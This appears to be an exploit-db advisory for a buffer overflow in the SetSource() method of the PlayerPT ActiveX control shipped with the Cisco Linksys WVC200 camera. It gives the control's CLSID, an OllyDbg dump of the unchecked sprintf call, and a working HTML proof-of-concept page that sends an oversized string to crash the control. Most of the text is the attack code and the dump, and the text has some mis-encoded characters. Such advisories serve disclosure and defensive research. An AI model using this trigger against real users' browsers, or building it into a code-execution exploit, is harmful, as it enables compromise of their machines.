The Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx auffers a buffer overflow vulnerability.
When viewing the device web interface it asks to install an ActiveX control with the following settings:
ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True
Vulnerability (Only for test):
the SetSource() method is vulnerable to a buffer overflow vulnerability. Quickly, ollydbg dump:
...
03238225Â Â 8B5424 20Â Â Â Â Â Â Â mov edx,dword ptr ss:[esp+20]
03238229Â Â 894424 10Â Â Â Â Â Â Â mov dword ptr ss:[esp+10],eax
0323822DÂ Â B9 32000000Â Â Â Â Â mov ecx,32
03238232Â Â 33C0Â Â Â Â Â Â Â Â Â Â Â Â xor eax,eax
03238234Â Â 8B72 F8Â Â Â Â Â Â Â Â Â mov esi,dword ptr ds:[edx-8]
03238237Â Â 8DBC24 E8020000Â lea edi,dword ptr ss:[esp+2E8]
0323823EÂ Â F3:ABÂ Â Â Â Â Â Â Â Â Â Â rep stos dword ptr es:[edi]
03238240Â Â 8B3D 0C062603Â Â Â mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246Â Â 52Â Â Â Â Â Â Â Â Â Â Â Â Â Â push edx
03238247Â Â 8D8C24 EC020000Â lea ecx,dword ptr ss:[esp+2EC]
0323824EÂ Â 68 48612603Â Â Â Â Â push PlayerPT.03266148Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â ; ASCII "%s"
03238253Â Â 51Â Â Â Â Â Â Â Â Â Â Â Â Â Â push ecx
03238254Â Â FFD7Â Â Â Â Â Â Â Â Â Â Â Â call edi <---------------boom
...
rgod
-->
<!-- saved from url=(0014)about:internet -->
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>
References: http://www.exploit-db.com/exploits/18641/